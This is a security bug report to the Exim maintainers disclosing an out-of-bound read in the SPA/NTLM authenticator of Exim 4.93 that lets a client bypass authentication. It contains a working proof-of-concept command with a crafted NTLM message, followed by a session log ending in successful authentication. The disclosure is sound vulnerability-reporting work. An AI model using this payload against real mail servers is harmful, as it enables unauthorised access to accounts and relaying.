https://bugs.exim.org/show_bug.cgi?id=2571
Bug ID: 2571
Summary: Out-of-bound buffer read leads to authentication
bypass in Exim SPA authentication method
Product: Exim
Version: 4.93
Hardware: x86-64
OS: Linux
Status: NEW
Severity: security
Priority: medium
Component: SMTP Authentication
Assignee: jgh146exb@???
Reporter: orange@???
CC: exim-dev@???
Hi, Exim security team.
I am Orange Tsai from DEVCORE security team. We just did a little audit on
authentication mechanisms, and found a out-of-bound buffer read on SPA
implementation.
In `spa.c`, there is no check on the user-supplied NTLM authentication message.
Since NTLM is an encoded structure. An attacker can supply customized `length`
and `offset` to read arbitrary memory address.
For example:
The SPA username/password challenge check is in `spa.c#248`.
https://github.com/Exim/exim/blob/master/src/src/auths/spa.c#L249
Since we control whole the `responseptr`, we can adjust the `offset` to the
address of `ntRespData` to bypass this authentication. Here is the PoC:
```
$ (echo 'EHLO test.org'; echo AUTH NTLM; echo "AAAA"; echo -ne
'o\x00r\x00a\x00n\x00g\x00e\x00\x00BDDCCCCBBGG\x70\x04\x00\x00BBCCCC\x0e\x00\x0e\x00\x0e\x00\x00\x00\x00\x00'
| b
ase64 -w0 ; echo ; echo QUIT) | ./exim -bh 127.0.0.1
**** SMTP testing session as if from host 127.0.0.1
**** but without any ident (RFC 1413) callback.
**** This is not for real!
>>> host in hosts_connection_nolog? no (option unset)
>>> host in host_lookup? yes (matched "*")
>>> looking up host name for 127.0.0.1
>>> IP address lookup using gethostbyaddr()
>>> IP address lookup yielded "localhost.localdomain"
>>> alias "localhost"
>>> no IP addresses found for localhost.localdomain
>>> no IP addresses found for localhost
>>> 127.0.0.1 does not match any IP address for localhost.localdomain
>>> host in host_reject_connection? no (option unset)
>>> host in sender_unqualified_hosts? no (option unset)
>>> host in recipient_unqualified_hosts? no (option unset)
>>> host in helo_verify_hosts? no (option unset)
>>> host in helo_try_verify_hosts? no (option unset)
>>> host in helo_accept_junk_hosts? no (option unset)
220 ubuntu ESMTP Exim 4.93 Sun, 03 May 2020 10:25:45 +0800
>>> test.org in helo_lookup_domains? no (end of list)
>>> host in dsn_advertise_hosts? no (option unset)
>>> host in pipelining_advertise_hosts? yes (matched "*")
>>> host in auth_advertise_hosts? yes (matched "*")
>>> host in chunking_advertise_hosts? yes (matched "*")
>>> host in tls_advertise_hosts? yes (matched "*")
250-ubuntu Hello test.org [127.0.0.1]
250-SIZE 52428800
250-8BITMIME
250-PIPELINING
250-AUTH NTLM
250-CHUNKING
250-STARTTLS
250-PRDR
250 HELP
334 NTLM supported
334 TlRMTVNTUAACAAAAAAAAAAAoAAABggAAEDPISlBkLXQAAAAAAAAAAAAAAAAAAAAA
>>> spa authenticator server_condition:
>>> $auth1 = orange
>>> $1 = orange
235 Authentication succeeded
221 ubuntu closing connection
```
Our configuration:
```
$ cat /usr/exim/configure
...
spa:
driver = spa
public_name = NTLM
server_password =
${lookup{$auth1}lsearch{/etc/exim/spa_clearpass}{$value}fail}
...
$ cat /etc/exim/spa_clearpass
orange:orange
```
--
You are receiving this mail because:
You are on the CC list for the bug.
